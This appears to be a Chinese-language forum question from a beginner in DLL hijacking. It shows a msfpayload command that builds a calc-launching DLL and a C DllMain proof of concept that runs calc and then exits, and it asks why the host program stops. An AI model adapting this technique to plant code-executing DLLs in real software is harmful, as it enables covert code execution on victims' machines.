大家好,我是 Dll 劫持的新手。我有几个问题,我希望你能帮助我澄清我的疑问。
假设我使用 msfpayload 生成了一个 calc dll
msfpayload windows/exec CMD=calc.exe D > abc.dll
msfpayload生成的dll文件运行正常,计算器随软件提示。
所以我使用了以下C代码:
#include <windows.h>
int owned()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
owned();
return 0;
}
当我编译这个并使用时,只有计算器会提示。软件不会执行。这是为什么?我使用 MinGW GCC 编译器进行编译。